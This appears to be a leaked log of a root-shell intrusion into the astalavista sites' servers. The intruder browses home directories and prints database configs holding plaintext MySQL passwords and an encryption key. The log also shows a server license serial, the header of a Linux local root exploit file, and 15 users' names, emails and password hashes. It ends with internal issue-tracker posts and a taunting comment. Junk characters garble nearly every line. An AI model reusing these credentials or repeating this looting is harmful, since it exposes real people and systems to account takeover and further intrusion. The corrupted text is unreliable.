-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout2 y, q8 M6 @+ ^. l1 F) q
-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile
+ j" g* B( R# n-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc
  ~2 Z+ I* D% v: Adrwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains- ~* \/ W) v& n/ C1 [) q% A
drwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap
1 U9 B/ J2 I8 C& b/ z5 K" j0 udrwx——  2 astanet astanet 4096 Dec 23 12:18 mail
+ t* [! c0 v! ^% a9 k6 d1 R1 t-rw——-  1 astanet astanet  197 Jun  4 09:51 .mysql_history1 `$ z0 v9 ]) H2 p
lrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html& ~$ r6 u: k. r* j
-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow) ]8 N7 |% k; Q" z1 g

, T# q0 R( \0 n7 }/ fsh-3.2# cd auth/
. ^0 v! I8 A# W- {9 f- S0 G3 c) Hsh-3.2# ls -la  ]3 W# z, s4 S" ~
total 28. A$ h; ?8 M5 w7 K$ [! M
drwxr-xr-x 2 root    root    4096 Dec 23 16:00 .
$ J) T* X8 h, qdrwx–x–x 6 astanet astanet 4096 Jun  4 09:51 ..1 C! \; s" L& n% C
-rw-r–r– 1 root    root     321 Jan  5  2006 hackercontest.config.inc.php$ u+ G4 g* @' n0 p: ~5 T
-rw-r–r– 1 root    root     319 Jan  5  2006 hosting.config.inc.php0 w1 [- s) p+ w0 R; l9 p: |0 i. v
-rw-r–r– 1 root    root      24 Jun  4 09:38 .htadm_pwd5 h" Y9 Z9 r: J
-rw-r–r– 1 root    root      49 Jan  5  2006 .htpasswd_newhosting2 J! E7 ?; o  l% J* E
-rw-r–r– 1 root    root      51 Oct 11  2006 .htwebalizer_pwd
) K8 M. H6 w. G% y5 Y+ |, \& N' {! X+ A5 N; I3 X, C
sh-3.2# cat hackercontest.config.inc.php
$ I9 f+ E. z( z2 [- n: b3 g<?PHP
. P9 K& V. B& g0 {1 i4 K+ K) n7 @// Variabeln f?r Verbindung zur Datenbank //
7 T* v7 l7 D. z0 G( @$conxHost = ‘localhost’;                       // MySQL hostname
# y, Z- S9 L  A" i$ H. E& P$conxUser = ‘hackercontest’;                                       // MySQL user9 |1 K' _6 A' b
$conxPassword = ‘K6m@7dUc’;                    // MySQL password
& H" J- g4 z* U) Q6 i$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish: {6 i8 {3 y6 R5 h8 n1 w
?>: o0 s7 h9 L3 {+ o
sh-3.2# cat hosting.config.inc.php' j! S2 ^/ c7 C+ H3 Y
<?PHP1 G2 }! e( r3 ~% C
// Variabeln f?r Verbindung zur Datenbank //
5 q. b9 N" i, I& A0 B$conxHost = ‘localhost’;                       // MySQL hostname
9 p3 I" p/ |9 _5 @# o% Q$conxUser = ‘hostinguser’;                                 // MySQL user* K1 Y* H& C7 F# `
$conxPassword = ‘cXvB3981′;                    // MySQL password
0 N; z9 O" n6 I5 A5 K" v$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish3 k$ }2 w2 u$ v8 N: P9 ~1 Q+ B! s6 `% U
?>4 D/ b1 ]$ h$ f

1 x+ x8 y9 \( P% C2 c' k" Psh-3.2# cd ..* S  ^' Z/ q* s/ k
sh-3.2# cd com$ X. ]2 o/ z+ M; M2 R- m) w
sh-3.2# ls -la
3 x& t% N+ d6 |( C6 g% C* dtotal 141208. ?6 W* _( w# S4 d
drwx–x–x 10 com  com       4096 Apr 28 12:40 .  C- f, i3 m3 R% q3 w- {2 f" C
drwxr-xr-x 14 root root      4096 Mar 11 17:56 ..
. G/ n4 n  z5 W. T' y; I7 E  @" vdrwx——  2 com  com       4096 Jun  4 04:04 backups# N! Z; G& M5 i$ B# `* G
-rw-r–r–  1 root root   2419504 Sep 28  2007 backup.sql
0 @* |  ]. R1 G" gdrwxr-xr-x  2 com  com       4096 May 12 15:20 backup_system
8 v' W! ?; p/ R+ G# R-rw——-  1 com  com      21880 Jun  2 08:07 .bash_history0 D  F! B$ C7 s+ q/ M# |: t
-rw-r–r–  1 com  com         24 Sep 24  2007 .bash_logout
: \* K+ F, |# A3 W9 E* y" _, Y" J$ U-rw-r–r–  1 com  com        176 Sep 24  2007 .bash_profile
7 ^3 u3 N: G7 \% x' y-rw-r–r–  1 com  com        124 Sep 24  2007 .bashrc
- t& l/ ]5 Q( @: ?8 Q5 ]drwx–x–x  3 com  com       4096 Jan 29  2008 domains8 a9 g4 x9 `2 m& o
-rw-r–r–  1 com  com      16409 Jul 16  2008 FWUser.class.php.fixed7 R! L2 o) |! d; e
drwxrwx—  3 com  mail      4096 Jan  6 19:24 imap! k; h- C+ I' g5 g9 F, X
-rw——-  1 com  com         69 Nov 18  2008 .lesshst3 {% }+ J7 q/ x  J5 f3 X
drwx——  2 com  com       4096 Sep 24  2007 mail
6 }3 V1 c# i1 c: O5 D: ~6 h-rw——-  1 com  com      13970 Mar 28 21:42 .mysql_history3 C" ^" ?+ ?: s1 o
drwxr-xr-x  2 com  com       4096 Aug 20  2008 .ncftp" e& N7 `* e7 X1 d
lrwxrwxrwx  1 com  com         37 Sep 24  2007 public_html -> ./domains/astalavista.com/public_html
1 a7 O- f, w4 P6 `8 U5 [# E-rw-r—–  1 com  mail        34 Sep 24  2007 .shadow( @# S, d8 ?% s! A7 ?
drwx——  2 com  com       4096 Aug 26  2008 .ssh
* q+ L7 I, p% T4 Y0 }0 g-rwx——  1 com  com       8515 Feb 10  2008 t6 b5 k' N8 G( D- |/ Q
-rw-rw-r–  1 com  com       6265 Feb 11  2008 t.c
2 m1 r% }( G1 E) ?5 q2 ddrwxrwxr-x  2 com  com       4096 Jan 30 15:47 tmp2 x) H  O& _, i/ I" p- l
-rw-rw-r–  1 com  com        617 May 20  2008 .toprc
% J5 x) n; f. M# l1 G8 Z-rw-rw-r–  1 com  com  141851766 May 19  2008 version2-backup-20080519-0900.sql
. ?1 D4 W- ]& K/ Z& N2 ?-rw——-  1 com  com      16629 Mar 28 21:46 .viminfo
& A3 t5 D7 l2 V, g-rw-rw-r–  1 com  com         51 Aug 25  2008 .vimrc
- M  @7 n/ k' t- K# l+ q% D2 N2 ~4 J9 h8 N/ b1 H6 F( s6 Y
sh-3.2# head t.c, t, h* M) j# t
/*. e2 [- X0 F- `2 i3 q
* jessica_biel_naked_in_my_bed.c
) o6 W. a) R( Z' }% P9 b*
8 a9 R9 A& S, `4 D* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
+ i$ z- i" ~6 u7 @3 S* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.. w# L6 f9 g2 Q+ ]; s: Y
* Stejnak je to stare jak cyp a aj jakesyk rozbite.' N0 d; {+ C8 F: j; s4 \0 F) Y$ @
*: A0 F+ b( \2 e0 j9 u8 s
* Linux vmsplice Local Root Exploit4 g& i+ ?/ c* e2 `: O
* By qaaz
0 y/ O3 `5 h8 [; @0 q* i3 o*: ^  X& s& q7 @* \

8 M7 m) i8 `  B1 f" Q* psh-3.2# cd /
9 p; i8 J. }. i/ ush-3.2# ls -la. U/ x+ S9 F; T* m3 y
total 360
& p1 o% @! s6 D3 P$ adrwxr-xr-x  25 root root   4096 Jun  3 02:43 .$ O! t0 j# P3 e# z+ p
drwxr-xr-x  25 root root   4096 Jun  3 02:43 ..; ^% z& ~- Z' J
-rw——-   1 root root  10240 Jun  3 02:39 aquota.group
( s4 m) q3 I7 c+ C* X: U-rw——-   1 root root  10240 Jun  3 02:39 aquota.user" G4 B5 @  y' L/ X
-rw-r—–   1 root root    819 Jul 17  2008 astalavista.us.db6 G, J6 g" i3 y; l" v
-rw-r–r–   1 root root      0 Jun  3 02:43 .autofsck
& g- k$ {9 f9 [- I# Z3 }-rw-r–r–   1 root root      0 Sep 16  2007 .autorelabel
9 |+ C& ]$ q9 h, }- w/ p& Q- Ldrwxr-xr-x   3 root root   4096 Dec 29  2007 backup
, C/ }# _+ {6 H! u9 \4 I/ _" vdrwxr-xr-x   2 root root   4096 Jun  4 04:03 bin9 m6 m9 ?+ p; p1 K, f" u
drwxr-xr-x   5 root root   4096 Jun  2 14:06 boot
# ?5 m* I$ \( @# f2 wdrwxr-xr-x  11 root root   3620 Jun  3 02:43 dev
# J; y- K2 E- |8 T1 g2 u9 y) A8 I$ N; hdrwxr-xr-x  84 root root  12288 Jun  4 03:16 etc( a; l% s# [% R
drwxr-xr-x  14 root root   4096 Mar 11 17:56 home% @+ p; j; [* u4 H! s: B
-rw-r–r–   1 root root  13387 Mar 20  2008 httpd.conf
% k1 f3 C% B& `, f: R- Cdrwxr-xr-x  11 root root   4096 Jun  4 04:02 lib
! m* I, ~1 `  g% x7 M! S# E, s/ Kdrwxr-xr-x   7 root root   4096 Jun  4 04:03 lib64# d4 }2 \/ s% y1 C4 z4 o6 c) ~
drwx——   2 root root  16384 Sep 11  2007 lost+found
9 K* S3 ?. x8 E9 M2 D  u) s0 V% E: H1 cdrwxr-xr-x   2 root root   4096 Mar 11 17:56 media$ F+ p8 R% {8 |4 B3 ~  x
drwxr-xr-x   2 root root      0 Jun  3 02:43 misc: s6 ~8 l5 U4 i8 W  W( R
drwxr-xr-x   2 root root   4096 Mar 11 17:56 mnt
& K4 D* y# e( A-rw-r–r–   1 root root   5859 Feb  3  2008 mrtg.cfg/ H* p' E% b3 w$ b
drwxr-xr-x   2 root root      0 Jun  3 02:43 net$ `  p% k' f$ o" F
drwxr-xr-x   3 root root   4096 Mar 11 17:56 opt3 v* p1 I! o- X$ S
dr-xr-xr-x 264 root root      0 Jun  3 02:42 proc
8 o/ i4 U/ P& N' gdrwxr-x—  15 root root   4096 Jun  4 08:40 root/ R/ d: z3 @+ p9 E2 {' k+ ]
drwxr-xr-x   2 root root  12288 Jun  4 04:03 sbin* m' G6 T( V2 U% W$ B
drwxr-xr-x   2 root root   4096 Mar 11 17:56 selinux6 Y7 [$ ~! S5 H7 o( L/ Z
drwxr-xr-x   2 root root   4096 Mar 11 17:56 srv
2 x; R# }; [& R7 _; Zdrwxr-xr-x  11 root root      0 Jun  3 02:42 sys
" Q7 q6 `  z/ a* ldrwxrwxrwt   4 root root 122880 Jun  4 10:35 tmp. ?. z# U6 @4 {; G9 g1 S# M
drwxr-xr-x  16 root root   4096 Jun  2 13:56 usr
! J1 L7 U4 y* B; Ddrwxr-xr-x  26 root root   4096 Jun  4 03:16 var5 F) ~! w( H; @+ ^

1 w' q. J, c6 s) p% Hsh-3.2# cd opt
' ~4 [$ ]% ~2 E2 H' V7 ish-3.2# ls -la
0 R9 S' R) a: J0 A: K0 e. xtotal 20
7 A% R' O2 O) H, T$ C" x# U  Jdrwxr-xr-x  3 root root 4096 Mar 11 17:56 .$ X  `! Y9 P' x% L
drwxr-xr-x 25 root root 4096 Jun  3 02:43 ..  J; E% u1 \0 [2 ]1 _/ K2 @
drwxr-xr-x 15 root root 4096 Mar 20  2008 lsws
8 Y, F$ |# w0 D/ L4 J
; x, |* e: Y# q' F" \% I; [/ Ush-3.2# cd lsws/
, ]& W( b: Q! T, hsh-3.2# ls -la
) G+ \6 X: q7 }8 \  O: Ototal 1085 d4 ]% C# Y. x) x0 e% e5 Y" ~
drwxr-xr-x 15 root   root    4096 Mar 20  2008 .
" h, \# Z9 \8 b' V$ Rdrwxr-xr-x  3 root   root    4096 Mar 11 17:56 ..9 f. F- H* _& i- \$ R
drwxr-xr-x  8 root   root    4096 Mar 20  2008 add-ons
. j: y! k2 n8 z3 E; h, gdrwxr-xr-x 13 root   root    4096 May 29 15:10 admin
9 ~- G4 N" X% c+ u- w' S2 F5 {# \3 ?drwxr-xr-x  5 apache apache  4096 May 29 15:10 autoupdate
8 m( n9 [- T. b1 L8 jdrwxr-xr-x  2 root   root    4096 May 29 15:10 bin
8 d  D" g% B  A) d7 M, edrwx——  4 apache apache  4096 Jun  3 02:43 conf
- g  F) B7 w- i5 U/ Ddrwxr-xr-x  7 apache apache  4096 Mar 20  2008 DEFAULT
: U" V+ x1 H2 N$ e( Odrwxr-xr-x  2 root   root    4096 Sep 15  2008 docs$ C( a9 ?1 a! I
drwxr-xr-x  2 root   root    4096 May 29 15:10 fcgi-bin
; p& S- l% [; y2 F: edrwxr-xr-x  2 root   root    4096 Sep 15  2008 lib! h" L/ S  V" Y; b% u1 e
-rw-r–r–  1 root   root    6959 May 29 15:10 LICENSE
2 z0 }* H+ e! o- d-rw-r–r–  1 root   root    2214 May 29 15:10 LICENSE.OpenLDAP1 ?! q6 m4 V* j1 T# _; e
-rw-r–r–  1 root   root    6279 May 29 15:10 LICENSE.OpenSSL7 _. H  x: h: u2 E1 K  M
-rw-r–r–  1 root   root    3208 May 29 15:10 LICENSE.PHP7 U0 q8 b4 ^7 W1 A3 |
drwxr-xr-x  2 root   root   20480 Jun  4 09:55 logs
  }. t$ X' s- H/ bdrwxr-xr-x  2 root   root    4096 Mar 20  2008 php
% `( S5 Y; e6 j; Ddrwx——  2 apache apache  4096 Mar 20  2008 phpbuild! R( a  A8 W- |* e: U4 t, ?
drwxr-xr-x  3 root   root    4096 Mar 20  2008 share5 I3 j* }0 y: I: f+ x& {
-rw-r–r–  1 root   root       6 May 29 15:10 VERSION0 E' }9 x. j* H. v) Y1 I
& y: j6 A* \4 K: Q) q6 h
sh-3.2# cd conf" z8 @% W" \, ~7 W) z
sh-3.2# ls -la
5 M+ H3 {* J5 p6 r2 n4 r+ [4 a1 ^total 48, l# f8 L8 P- z0 A1 _
drwx——  4 apache apache 4096 Jun  3 02:43 .
& H: j% u& Z  p: k7 ?4 \" Mdrwxr-xr-x 15 root   root   4096 Mar 20  2008 ..
; J4 G7 s# H. i; f; u1 m: cdrwx——  2 apache apache 4096 Mar 20  2008 cert6 j- A& e+ I" H& k4 u) q
-rw-r–r–  1 apache apache 6668 May 29 15:13 httpd_config.xml
' X; N: y3 b# L' x+ w-rw——-  1 apache apache 6613 May 27 18:33 httpd_config.xml.bak% Z( P, i* n0 k
-rw-r–r–  1 root   apache    0 Jun  3 14:11 .last
- z% }1 u: ?8 l# W' y, [/ f6 }-rw——-  1 apache apache  256 May 29 15:10 license.key
" V( y# u: B. n* s! f-rw——-  1 apache apache  256 Mar 21  2008 license.key.old7 a& W, x! y) f7 J* |" ~
-rw——-  1 apache apache 3320 Mar 20  2008 mime.properties
) I& i" E" O- v3 Z, \5 O0 U-rw——-  1 apache apache   20 May 29 15:10 serial.no6 y+ P7 A& _6 U* P) R
drwx——  2 apache apache 4096 Mar 20  2008 templates
9 W8 s$ [/ u/ {2 E/ i) b4 x1 ~5 `" x. c
sh-3.2# cat serial.no
1 b9 S5 D$ x; g1 l1 A2 XIbDl-oVsO-CKqL-wVRa
  j) j+ k$ x9 |6 B7 s  e4 @* S" t/ {3 T
' T% v0 c. x9 r: Y7 W, Wsh-3.2# mysql
) p3 m' ]  g  M* zWelcome to the MySQL monitor.  Commands end with ; or \g.
, p/ ?) c6 m7 Y1 v( I* y3 ZYour MySQL connection id is 286844
, @' M. n* X# O+ @# z& F1 nServer version: 5.0.45-community-log MySQL Community Edition (GPL)
" L' V. o4 k% n7 `9 m% ~0 ^+ B: l* I' u$ `4 t
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.1 e% [- d: j5 O+ C8 u/ O
7 G1 J6 Q% F: L" O/ u9 m1 s3 D
mysql> show databases;# D0 f0 o5 w9 N- R) S) \% n
+———————–+: w/ j3 L) J. Y$ `
| Database              |
: ^' \6 R7 y. ]2 U1 s+———————–+- \1 F, z4 d8 G8 K0 q, l
| information_schema    |
# l, o. ~; _$ h8 m( j0 N| astanet_ads           |
# O* t9 ]* h! M9 B4 j- l( q8 L| astanet_mailing_lists |2 N; ?0 x+ e% y' Q3 w( i
| astanet_mediawiki     |. z5 \3 U$ j. ]% P
| astanet_membersystem  |
, E4 c9 h4 ?- }0 C: [0 P$ c) z| com_contrexx          |1 Q5 J# j' @6 b* F, o
| com_contrexx2         |3 r, B. n4 S6 h$ X6 e1 g, [' ~
| com_contrexx2_live    |
# D$ z5 b7 q" q+ I| da_roundcube          |
. _5 E. ]1 {8 [8 c& I) X5 `| dolphin               |* {+ z5 U. {9 ?9 S' T  E4 x
| ideapool              |
! k9 W9 l5 D  O  i| mysql                 |4 T$ B' G! `$ }5 v9 Q
| test                  |
5 ]& D) l9 O  x: C; ^5 Y3 t| yourmaster            |0 C% O5 G5 I. a3 p- G% {
+———————–+
4 n5 x$ L& \# \8 d0 O5 y14 rows in set (0.00 sec)
: x: J" A. B5 y+ f
3 P9 _6 W4 z  I2 hmysql> use ideapool
- n5 L. p5 [% O. mDatabase changed" V: A! V: d# g$ ~2 A8 x- l
mysql> show tables;
5 x! `2 D7 Q3 w  o+———————————–+
9 `  E# S# x+ B6 t7 t| Tables_in_ideapool                |
3 E7 F* x0 ?1 z- S& Z; Q5 C$ q% o+———————————–+
7 z; {- j7 w3 |! Y! k% O| eventum_columns_to_display        |& u2 S  n4 J7 }. y$ j0 A! Q0 n0 ~
| eventum_custom_field              |4 s+ ]4 a7 r" b: X% J
| eventum_custom_field_option       |
( A9 \/ q+ H% o; P/ q$ |+ n| eventum_custom_filter             |' Z8 v8 G+ V, x; ]% l) F4 f$ _
| eventum_customer_account_manager  |
$ K. l# P. d5 k; g| eventum_customer_note             |5 E* e3 G. O  X) v8 }& r0 u
| eventum_email_account             |* P$ ?3 x1 J: D: m7 ?1 U
| eventum_email_draft               |' |% ?8 ^3 M4 ?, F
| eventum_email_draft_recipient     |
" ?3 b7 ^9 l; k, ^, z7 w: F7 }| eventum_email_response            |1 o7 p. C: o; T' Z1 Y
| eventum_faq                       |, E" w! e1 t. d  x! l. N
| eventum_faq_support_level         |& h# B7 D- b  n& U; _' {
| eventum_group                     |5 |2 U5 J# [9 b# [! T, p4 ?
| eventum_history_type              |2 r* H4 h2 w) l& O
| eventum_irc_notice                |7 L& s4 Y7 }/ M7 H
| eventum_issue                     |
2 o3 L8 l* f5 s% }: a8 s- m| eventum_issue_association         |; G! H: F/ K; N
| eventum_issue_attachment          |
' b( d7 k! ^3 B' r- A| eventum_issue_attachment_file     |: B1 ~  f5 d8 _0 F4 t
| eventum_issue_checkin             |
+ [' Y. b6 n$ z1 }" w| eventum_issue_custom_field        |6 F" |9 }1 b" r5 m7 Z! f
| eventum_issue_history             |
1 k" z& O/ W2 L| eventum_issue_quarantine          |
* u) n2 r6 l- p' c0 x( V( u| eventum_issue_requirement         |
1 |/ ~6 v5 q5 e" f* [# Q6 z| eventum_issue_user                |. i2 I- g) Q3 @% J4 m
| eventum_issue_user_replier        |3 |; u8 I' X5 \" b6 P
| eventum_link_filter               |
. Z9 S2 B! F$ P/ U' P. w| eventum_mail_queue                |
0 s( d+ _( ^( y( T2 g/ e* @| eventum_mail_queue_log            |) x  N( x. N5 M5 Y4 o" a( a2 ]8 I- l
| eventum_news                      |
  a' B7 ?: H$ g$ c) k# e| eventum_note                      |
) J: X7 D- T" W; r" Y| eventum_phone_support             |
# N5 e6 L3 p+ u| eventum_project                   |! z, m( k7 E" b1 i$ }% Q
| eventum_project_category          |
$ S; U. r& Z7 V2 [/ I| eventum_project_custom_field      |- ?3 l6 z' k7 P1 I) X6 v
| eventum_project_email_response    |: V8 K7 s! ]6 B) S8 {4 d7 a3 y
| eventum_project_field_display     |
+ r' L; s+ y2 [7 b% r| eventum_project_group             |8 D/ b$ |; o0 p+ q5 S( t
| eventum_project_link_filter       |) D: ]/ a* ?$ J8 C8 s  j4 S
| eventum_project_news              |/ L5 t! `$ ?1 u( Q5 p5 Y/ _$ K
| eventum_project_phone_category    |! v! n+ I: Q" n& g+ |4 R' N" A
| eventum_project_priority          |
- b0 P  ^5 J1 T# Z7 p| eventum_project_release           |
3 g- d" c; a  B2 I$ f' l| eventum_project_round_robin       |1 {4 O% `2 T' ~) ?* K* Z
| eventum_project_status            |9 G6 ~& Q. P) g! y
| eventum_project_status_date       |
9 F& V8 B* t4 M! l9 M+ I| eventum_project_user              |$ B) J. b5 V4 Z7 G5 R
| eventum_reminder_action           |
* T. }+ B3 Q# C, R6 J# m| eventum_reminder_action_list      |# q: Z3 K- ^6 g) z
| eventum_reminder_action_type      |. K. r: j4 e: q( N. j# L/ v
| eventum_reminder_field            |7 g- s. O3 ?' L0 E2 @
| eventum_reminder_history          |' z& q1 k# ^4 R0 ^
| eventum_reminder_level            |) u1 g7 [4 c' Y0 z/ V
| eventum_reminder_level_condition  |
: D4 H) y, }, a8 ]$ Q0 y4 K. r& @| eventum_reminder_operator         |# t' {- L3 P8 g$ g2 _; M
| eventum_reminder_priority         |
5 L4 q3 i- W5 ~" r  q1 w1 x| eventum_reminder_requirement      |
2 V4 G, |( r3 P# w| eventum_reminder_triggered_action |
' Y5 L2 V# v2 Y| eventum_resolution                |: C) M2 |; c1 \7 Q5 c
| eventum_round_robin_user          |# ?8 [- r/ v4 B
| eventum_search_profile            |
! h' P" A9 t0 p! _3 t9 L6 L' t6 p. I| eventum_status                    |( ]* p7 Z$ f- x, z% `' {
| eventum_subscription              |
5 h5 t5 T+ ]; j. A5 a/ Y/ {| eventum_subscription_type         |0 O0 P- j, G2 f1 j2 ~1 N6 {* g% O
| eventum_support_email             |4 e* [& Y) l. D  q/ A! N& v; x
| eventum_support_email_body        |
! p: P3 U' n+ s% `. {/ U| eventum_time_tracking             |
6 M0 x2 }9 D( m# O4 {| eventum_time_tracking_category    |
. Y  _- l% O: }' R( ?8 f& M9 F| eventum_user                      |
6 o& Y7 s0 h$ d+———————————–+
' L- \+ u  o2 z- Y0 Q. D# N. e4 W: Z+ E69 rows in set (0.00 sec)
# d9 b& O# t5 Z& F5 M6 l
+ Y( `+ g4 G& ]% @7 kmysql> describe eventum_user;
# F! e* @! D! e5 V+————————-+——————+——+—–+———————+—————-+9 N. W$ ]0 o3 }. s5 q
| Field                   | Type             | Null | Key | Default             | Extra          |" V7 H. T) O5 F' F; v9 g6 \  D& }
+————————-+——————+——+—–+———————+—————-+
! a* v2 o7 [$ g' R  V| usr_id                  | int(11) unsigned | NO   | PRI | NULL                | auto_increment |
- H& u* A4 Q! Q6 c3 q| usr_grp_id              | int(11) unsigned | YES  | MUL | NULL                |                |
- s: t5 J8 F& Z! t4 q3 w: d| usr_customer_id         | int(11) unsigned | YES  |     | NULL                |                |
* f3 d' x7 R! r& n! p| usr_customer_contact_id | int(11) unsigned | YES  |     | NULL                |                |- x8 {! B- W7 F. W5 a  @, K
| usr_created_date        | datetime         | NO   |     | 0000-00-00 00:00:00 |                |
) Q& O0 \( z' o$ n| usr_status              | varchar(8)       | NO   |     | active              |                |0 A) v. \1 J* X2 d0 q
| usr_password            | varchar(32)      | NO   |     |                     |                |
) J3 I0 `! z- j  c: C) Z| usr_full_name           | varchar(255)     | NO   |     |                     |                |1 I; v5 [/ r0 Z# X
| usr_email               | varchar(255)     | NO   | UNI |                     |                |
8 w+ n: Y; f, w0 p3 @9 L# ~9 }5 B| usr_preferences         | longtext         | YES  |     | NULL                |                |( S0 Z2 y, f: M( [9 y6 k$ I1 u
| usr_sms_email           | varchar(255)     | YES  |     | NULL                |                |3 T- G" Y% v1 G. w( N
| usr_clocked_in          | tinyint(1)       | YES  |     | 0                   |                |! a/ `+ G$ f" K1 T, f
| usr_lang                | varchar(5)       | YES  |     | NULL                |                |: n) g. C4 |9 p+ B/ @4 t$ n
+————————-+——————+——+—–+———————+—————-+8 C+ c9 |  s6 T( ?$ z( P0 m$ D
13 rows in set (0.00 sec)
% Q1 ]$ `1 ]7 e1 \
; C, r7 @. F$ Ymysql> select usr_full_name,usr_email,usr_password from eventum_user;
. F) Q& b9 C' p+———————-+——————————-+———————————-+
: C( ?& p) u2 Y* r( S; L| usr_full_name        | usr_email                     | usr_password                     |8 f+ X$ r6 w9 C" U: X1 ]2 n
+———————-+——————————-+———————————-+
4 J1 q; Z8 M. R2 ?" y* X| system               | 链接标记system-account@example.com    | 14589714398751513457adf349173434 |. D9 g8 x0 q. x3 ^% l
| Developer (Paulo)    | 链接标记paulo.santos@astalavista.ch   | 26a35a1cf8895c27fb37ef4cf149f7bb |# \, m$ R5 l6 Z7 J' [8 `# b
| Be1er0ph0r           | 链接标记be1er0ph0r@gmx.de             | 229766dc0ca1fb67160a8782321dfdce |
  z' c  x3 f' ]8 ]! L| Admin                | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |4 @# A. ~, t- `. O
| ADMIN                | 链接标记admin@astalavista.ch          | f6fdffe48c908deb0f4c3bd36c032e72 |6 [& l7 g7 c+ O2 O. d/ j! u7 B9 ^- n
| USER                 | 链接标记user@astalavista.ch           | 5cc32e366c87c4cb49e4309b75f57d64 |
2 w, J0 N7 H4 B- k, O( b| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com       | f7735ab119023a8abb2301e67f81cd67 |
0 a9 F/ y' k- L2 u' |- j! U| Joao                 | 链接标记joao.pontes@astalavista.net   | f805c071d7c823b937448c54c047b9fd |
* M& k  E; E, y4 e| Pascal               | 链接标记pm@astalavista.ch             | e10adc3949ba59abbe56e057f20f883e |
& W) Y5 k6 C& L2 E| commander            | 链接标记commander@astalavista.com     | 932cd250918f881d41feb0b93883a926 |
2 U: F6 G7 J9 Q1 Z8 I( ~: x/ R| ishtus               | 链接标记ishtus@astalavista.com        | a587ffc88b3dbbba3fd2fe67af649ff0 |. ]# v) g3 `9 n4 y0 @. f  R* o' ]
| sykadul              | 链接标记sykadul@astalavista.com       | 20224a2f3eeb57a13a10b4df543c128e |0 @4 M+ Q2 i8 I* g! Q; k/ K
| Zach McElroy         | 链接标记admin@badfoo.net              | 33c5d4954da881814420f3ba39772644 |
6 M$ E" k/ `3 ^| usb                  | 链接标记usbenigma@hushmail.com        | b513f22c3db6932855ad732f5f8a10a2 |' h" m- p5 G0 L, c9 x! B: i9 o
| cyph3r               | 链接标记cyph3r@astalavista.com        | 6e1e50017a945e874d52ec91f9ab2cee |
$ y% L, A& C) x3 O7 \- I+———————-+——————————-+———————————-+* Q0 q* Z* B# A" J! Y! R. x- b
15 rows in set (0.00 sec), M0 c! A' o9 b$ ~7 ]

1 G. l7 o9 d9 _3 qmysql> select iss_description from eventum_issue where iss_id = 43;
# ?4 V  E  Z( x4 C5 ^5 x, }6 d+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+/ x9 q- N( J/ b* }
| iss_description                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
! _- X2 o( C3 V) h|) d% Q, O& M! |: M8 k% J# r5 {' r
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
  K5 H: f9 C) d9 T( W| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
1 i- a+ k5 W% `connected for 90 mins… 120mins… so what i propose is something like:
% b! S+ C/ c6 r6 G) r0 |) P链接标记[url]http://www.surfthechannel.com/[/url]& r4 T5 F4 E4 \8 k. B& S
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
' l+ d# M# R) tlike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
+ h& q! D$ z, W0 k* f5 V; ?break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
1 B& f& Q7 W3 c& A6 h  B1 |: K5 R1 lif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
- O; c/ D' u- }) v2 t( _6 l
- v! l+ d! A7 z+ U; TWe could also put advertisement during play on the flash video player itself… extra $$…
8 [* w6 [- t# T) U/ S* ?
0 A6 V: k" @$ y; aBy sykadul |3 G8 o% f' C: }7 t9 H9 b1 b
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+0 F+ |$ G3 L  u! q, J/ L/ O  `
1 row in set (0.00 sec)2 h5 w' ?" l& s2 P! a3 x1 @6 W
! g3 m9 @# R) F9 C3 t: ^' B
// Money and extra $$ is all they care about. remember that.
) j- f$ p; t! `
- T4 t2 u$ A  s9 @& g2 imysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
  V% b/ i  Y& c' w+————————+——————————————————————————————————————————————————————————————————————————————-+5 w" U: A+ q% G8 c& ~! ~
| iss_summary            | iss_description                                                                                                                                                                                                                          
9 b, q" s4 D- p/ l5 u- S& I|
( z7 Q; \2 y6 [6 ?+————————+——————————————————————————————————————————————————————————————————————————————-+/ B4 E4 D* U; D4 y/ f) J
| Forum for REAL EXPERTS | Hello,0 Y+ G/ \' q1 a, f6 r( B3 f$ D
+ K5 ~# a! o8 O3 {
Ishtus and I,
3 n7 b7 @) `' w0 p0 ^: [' O, o
9 y, o5 E  G8 x/ @Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
) p' [8 L5 I+ n$ \ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
( {* ^* x4 B& O2 s4 u
9 D  Q8 b- y) I# t% U  T$ ?- j5 cOne example a friend of mine from coresecurity.com!5 q/ @! {. k& K- _1 }- H
, \, m9 R, R- F- h  A1 T
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..% L; \& @: `9 s6 E3 `5 [
9 A7 R- e; u" o9 w4 Y, G
|- H& v* p  ?) H( S* H6 N/ D
+————————+——————————————————————————————————————————————————————————————————————————————+
+ N% x  U% n/ b/ f/ A1 row in set (0.00 sec)
